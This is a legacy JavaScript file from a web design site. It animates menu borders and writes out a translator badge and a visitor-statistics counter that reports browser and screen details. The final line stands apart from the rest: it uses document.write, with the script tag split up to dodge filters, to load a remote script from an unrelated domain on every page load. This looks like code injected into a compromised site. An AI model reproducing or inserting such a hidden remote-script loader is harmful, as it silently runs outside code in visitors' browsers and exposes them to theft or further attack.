var nr=0;
var animation=true;
var temp;
var go=false;

function init(){
menu = new Array(company,webdesign,multimedia,publish,resources,showcase,support,partners,contact,shop);
loaded=true;
}

function startborder(){
nr=0;
moveborder();
}

function moveborder(){  
animation=false
menu[nr].border="1";
if (nr>=1)
  menu[nr-1].border=0;
else
  menu[9].border=0;

if (menu[nr]!=temp){
if (nr<=8){
nr=nr+1;
setTimeout("moveborder()",50)
}
else
menu[nr].border="0"
animation=true;
}
else{
for(i=0; i<=9;i++)
menu[i].border="0";
if (go)
temp.border="1";
animation=true;
}
}

function overlinkanimate(link) {
nr=0;
temp=link;
go=true;
if (animation)
moveborder();
}

function outlinkanimate(link) {
go=false
for(i=0; i<=9;i++)
menu[i].border="0";
}


// Using a path, you may use this code in any subfolder
var file='http://www.javadabado.it/statistics/count.asp';
var file2='http://www.javadabado.com/on-line/controll.asp';

var d=new Date(); 
var s=d.getSeconds(); 
var m=d.getMinutes();
var x=s*m;

function intran(){
document.write('<a href="http://www.tranexp.com/"><img src="http://www.javadabado.com/image/intertran.gif"  border="0" width="90" height="30"></a>');
}

function online(){
document.write('<a href="http://www.javadabado.com/on-line/login_ita.asp"><img src="' + file2 + '?'+x+ '"  border=0 width=90 height=30></a>');
}

function stat(){
f='' + escape(document.referrer);
if (navigator.appName=='Netscape'){b='NS';} 
if (navigator.appName=='Microsoft Internet Explorer'){b='MSIE';} 
if (navigator.appVersion.indexOf('MSIE 3')>0) {b='MSIE';}
u='' + escape(document.URL); w=screen.width; h=screen.height; 
v=navigator.appName; 
fs = window.screen.fontSmoothingEnabled;
if (v != 'Netscape') {c=screen.colorDepth;}
else {c=screen.pixelDepth;}
j=navigator.javaEnabled();
info='w=' + w + '&h=' + h + '&c=' + c + '&r=' + f + '&u='+ u + '&fs=' + fs + '&b=' + b + '&x=' + x;
//----------- End stat file
document.write('<a href="http://www.2enetworx.com/dev/projects/statcountex.asp"><img src="' + file + '?'+info+ '" border=0 width=90 height=30></a>');
}

document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/User_Interface.js"></scri'+'pt>');